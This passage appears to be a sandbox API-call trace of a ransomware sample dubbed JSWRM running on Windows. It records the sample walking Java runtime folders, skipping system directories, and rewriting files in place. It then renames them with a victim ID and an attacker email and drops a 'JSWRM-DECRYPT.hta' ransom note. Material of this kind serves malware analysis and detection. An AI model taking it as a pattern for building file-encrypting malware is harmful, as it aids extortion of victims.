(lpString1="logging.properties", lpString2="perflogs") returned -1 [0070.893] lstrcmpiW (lpString1="logging.properties", lpString2="documents and settings") returned 1 [0070.893] lstrcmpiW (lpString1="logging.properties", lpString2="$RECYCLE.BIN") returned 1 [0070.893] lstrcmpiW (lpString1="logging.properties", lpString2="system volume information") returned -1 [0070.893] lstrcmpiW (lpString1="logging.properties", lpString2="msocache") returned -1 [0070.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="logging.properties", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0070.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0070.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="logging.properties", cchWideChar=18, lpMultiByteStr=0x241128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="logging.properties", lpUsedDefaultChar=0x0) returned 18 [0070.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="logging.properties", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0070.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0070.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="logging.properties", cchWideChar=18, lpMultiByteStr=0x241038, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="logging.properties", lpUsedDefaultChar=0x0) returned 18 [0070.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0070.893] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0070.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.893] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.893] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0070.894] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\logging.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.894] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=2455) returned 1 [0070.894] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.894] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x990) returned 0x23fc98 [0070.894] ReadFile (in: hFile=0x454, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345ec04*=0x990, lpOverlapped=0x0) returned 1 [0070.895] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.895] WriteFile (in: hFile=0x454, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345ec00*=0x990, lpOverlapped=0x0) returned 1 [0070.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0070.896] CloseHandle (hObject=0x454) returned 1 [0070.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0070.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0070.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0070.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0070.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0070.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f970 [0070.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.896] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\logging.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\logging.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\logging.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0070.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0070.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0070.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0070.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0070.897] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1389711, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="management", cAlternateFileName="MANAGE~1")) returned 1 [0070.897] lstrcmpiW (lpString1="management", lpString2=".") returned 1 [0070.897] lstrcmpiW (lpString1="management", lpString2="..") returned 1 [0070.897] lstrcmpiW (lpString1="management", lpString2="...") returned 1 [0070.897] lstrcmpiW (lpString1="management", lpString2="windows") returned -1 [0070.897] lstrcmpiW (lpString1="management", lpString2="recovery") returned -1 [0070.897] lstrcmpiW (lpString1="management", lpString2="perflogs") returned -1 [0070.897] lstrcmpiW (lpString1="management", lpString2="documents and settings") returned 1 [0070.897] lstrcmpiW (lpString1="management", lpString2="$RECYCLE.BIN") returned 1 [0070.897] lstrcmpiW (lpString1="management", lpString2="system volume information") returned -1 [0070.897] lstrcmpiW (lpString1="management", lpString2="msocache") returned -1 [0070.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0070.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0070.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0070.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0070.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217b40 [0070.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0070.897] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jswrm-decrypt.hta")) returned 0xffffffff [0070.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217b40 | out: hHeap=0x1e0000) returned 1 [0070.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0070.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0070.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0070.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0070.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0070.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0070.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217880 [0070.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0070.901] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.902] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.902] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0070.905] CloseHandle (hObject=0x454) returned 1 [0070.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217880 | out: hHeap=0x1e0000) returned 1 [0070.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0070.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0070.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0070.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0070.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0070.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0070.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0070.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0070.905] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jswrm-decrypt.hta")) returned 0x20 [0070.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0070.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0070.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0070.905] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1389711, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20eb8e44, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231d00 [0070.905] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.905] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1389711, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x20eb8e44, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0070.905] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.906] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.906] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf9e, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="jmxremote.access", cAlternateFileName="JMXREM~1.ACC")) returned 1 [0070.906] lstrcmpiW (lpString1="jmxremote.access", lpString2=".") returned 1 [0070.906] lstrcmpiW (lpString1="jmxremote.access", lpString2="..") returned 1 [0070.906] lstrcmpiW (lpString1="jmxremote.access", lpString2="...") returned 1 [0070.906] lstrcmpiW (lpString1="jmxremote.access", lpString2="windows") returned -1 [0070.906] lstrcmpiW (lpString1="jmxremote.access", lpString2="recovery") returned -1 [0070.906] lstrcmpiW (lpString1="jmxremote.access", lpString2="perflogs") returned -1 [0070.906] lstrcmpiW (lpString1="jmxremote.access", lpString2="documents and settings") returned 1 [0070.906] lstrcmpiW (lpString1="jmxremote.access", lpString2="$RECYCLE.BIN") returned 1 [0070.906] lstrcmpiW (lpString1="jmxremote.access", lpString2="system volume information") returned -1 [0070.906] lstrcmpiW (lpString1="jmxremote.access", lpString2="msocache") returned -1 [0070.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jmxremote.access", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0070.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0070.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jmxremote.access", cchWideChar=16, lpMultiByteStr=0x240f70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jmxremote.access", lpUsedDefaultChar=0x0) returned 16 [0070.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jmxremote.access", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0070.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0070.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jmxremote.access", cchWideChar=16, lpMultiByteStr=0x2411c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jmxremote.access", lpUsedDefaultChar=0x0) returned 16 [0070.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0070.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0070.906] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.access"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.907] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3998) returned 1 [0070.907] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.907] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf90) returned 0x24e1e0 [0070.908] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xf90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xf90, lpOverlapped=0x0) returned 1 [0070.909] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.909] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xf90, lpOverlapped=0x0) returned 1 [0070.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.909] CloseHandle (hObject=0x458) returned 1 [0070.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0070.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0070.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0070.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0070.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0070.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0070.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0070.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.910] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.910] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.access"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.access.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.access.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0070.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0070.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0070.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0070.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0070.911] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xb28, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="jmxremote.password.template", cAlternateFileName="JMXREM~1.TEM")) returned 1 [0070.911] lstrcmpiW (lpString1="jmxremote.password.template", lpString2=".") returned 1 [0070.911] lstrcmpiW (lpString1="jmxremote.password.template", lpString2="..") returned 1 [0070.911] lstrcmpiW (lpString1="jmxremote.password.template", lpString2="...") returned 1 [0070.911] lstrcmpiW (lpString1="jmxremote.password.template", lpString2="windows") returned -1 [0070.911] lstrcmpiW (lpString1="jmxremote.password.template", lpString2="recovery") returned -1 [0070.911] lstrcmpiW (lpString1="jmxremote.password.template", lpString2="perflogs") returned -1 [0070.911] lstrcmpiW (lpString1="jmxremote.password.template", lpString2="documents and settings") returned 1 [0070.911] lstrcmpiW (lpString1="jmxremote.password.template", lpString2="$RECYCLE.BIN") returned 1 [0070.911] lstrcmpiW (lpString1="jmxremote.password.template", lpString2="system volume information") returned -1 [0070.911] lstrcmpiW (lpString1="jmxremote.password.template", lpString2="msocache") returned -1 [0070.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0070.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jmxremote.password.template", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0070.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0070.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jmxremote.password.template", cchWideChar=27, lpMultiByteStr=0x240f48, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jmxremote.password.template", lpUsedDefaultChar=0x0) returned 27 [0070.911] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0070.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0070.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jmxremote.password.template", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0070.911] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0070.911] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jmxremote.password.template", cchWideChar=27, 